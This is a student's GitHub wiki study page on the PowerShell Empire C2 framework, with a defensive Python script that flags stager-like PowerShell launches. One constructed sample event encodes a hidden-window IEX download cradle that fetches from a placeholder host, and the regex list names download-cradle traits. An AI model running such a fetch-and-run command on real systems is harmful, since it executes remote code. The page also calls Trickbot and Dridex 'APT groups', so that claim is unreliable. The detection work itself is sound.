Persistence.md - Juan-bit94/Ops401D10 GitHub Wiki

PowerShell Empire Framework Is No Longer Maintained

Why does this topic matter?

  • This topic matters because understanding offensive security techniques helps IT professionals and organizations recognize the tactics, techniques, and procedures (TTPs) employed by malicious actors. Awareness of frameworks such as PS Empire is crucial for developing effective defensive strategies and mitigating cyber threats.

What is one of the major advantages of PowerShell Empire?

  • The major advantage of PowerShell Empire is that it uses encrypted communication with the command and control server, which makes its traffic difficult to detect in large networks.

What are some of the APT groups that have been known to use PS Empire and into which step of the Cyber Kill Chain does the use of PS Empire fall?

  • Various APT groups have been known to use PS Empire; here is a short list:
    • Hades
    • FIN7 crime group
    • Trickbot
    • Dridex
  • When PS Empire is in use, it falls under the following steps of the Cyber Kill Chain:
    • Exploitation: PowerShell Empire can be used to exploit vulnerabilities in target systems. It leverages PowerShell scripts to execute commands and run malicious payloads on compromised systems.
    • Command and control (C2): Once a system is compromised, PowerShell Empire provides a command and control infrastructure for the attacker to maintain persistent access and control over the compromised systems.

What are the four main components needed to pull off an attack using PS Empire?

  • The four main components needed for a PS Empire attack are the following:
    1. Listener: This is a component of PowerShell Empire that listens for incoming connections from compromised systems. It acts as a command and control (C2) server, allowing the attacker to interact with compromised systems.
    2. Module: This is a collection of scripts that provide specific functionalities for carrying out various tasks during an attack. These tasks can include reconnaissance, privilege escalation, and lateral movement.
    3. Stager: This is the initial stage of the payload; it is responsible for establishing communication with the attacker's listener and downloading the full payload onto the compromised system.
    4. Agent: This maintains communication with the attacker's listener. The agent allows the attacker to execute commands, exfiltrate data, and perform various malicious activities on the compromised system.
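  From the defender's side, the stager step above is usually the most visible one: the initial launch shows up in PowerShell command-line or script-block logging as an encoded, hidden-window download cradle. The triage script below is an added example for these notes, not Empire's own code; the event dictionary shape, the `score_event`/`triage` names and the three sample events are constructed assumptions.

```python
"""Triage Windows PowerShell command-line/script-block events for traits that
commonly mark a C2 stager launch (encoded command, hidden window, download
cradle). Assumed event shape: {"id": int, "command_line": str}; the sample
events at the bottom are constructed for this example, not real telemetry."""
import base64
import re

# Indicator name -> regex applied to the lower-cased command line plus its decoded payload.
INDICATORS = {
    "encoded_command": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}"),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden|-w\s+1\b"),
    "no_profile_noninteractive": re.compile(r"-nop\b|-noprofile\b|-noni\b|-noninteractive\b"),
    "exec_policy_bypass": re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass"),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression"),
    "download_cradle": re.compile(r"net\.webclient|downloadstring|downloaddata|invoke-webrequest"),
}
ENC_ARG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)

def decode_encoded_command(command_line):
    """Return the -EncodedCommand payload decoded as UTF-16LE, or '' if absent/undecodable."""
    m = ENC_ARG.search(command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return ""

def score_event(command_line):
    """Sorted indicator names found in the command line or its decoded payload."""
    text = (command_line + "\n" + decode_encoded_command(command_line)).lower()
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def triage(events, threshold=3):
    """Return [(event_id, indicators)] for events with at least `threshold` indicators."""
    flagged = []
    for ev in events:
        hits = score_event(ev["command_line"])
        if len(hits) >= threshold:
            flagged.append((ev["id"], hits))
    return flagged

def _enc(ps):  # build an encoded payload the way PowerShell expects it (constructed sample only)
    return base64.b64encode(ps.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [  # constructed: one benign script, one stager-like launch, one admin one-liner
    {"id": 1, "command_line": "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"},
    {"id": 2, "command_line": "powershell -NoP -NonI -W Hidden -Enc " + _enc(
        "IEX (New-Object Net.WebClient).DownloadString('http://launcher.example.invalid/')")},
    {"id": 3, "command_line": "powershell -ExecutionPolicy Bypass -Command Get-Process"},
]

if __name__ == "__main__":
    for event_id, hits in triage(SAMPLE_EVENTS):
        print(f"event {event_id}: {', '.join(hits)}")
```

  Single indicators such as `-NoProfile` or `-ExecutionPolicy Bypass` are common in legitimate administration, which is why only events stacking several of them are flagged.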

Things I want to know more about.

  • I would like to know more about the various modules available in the PowerShell Empire Framework, including modules for reconnaissance, exploitation, and persistence.
  • In addition, I would like to learn how to set up and configure listeners in PowerShell Empire to establish command and control (C2) communication with compromised systems.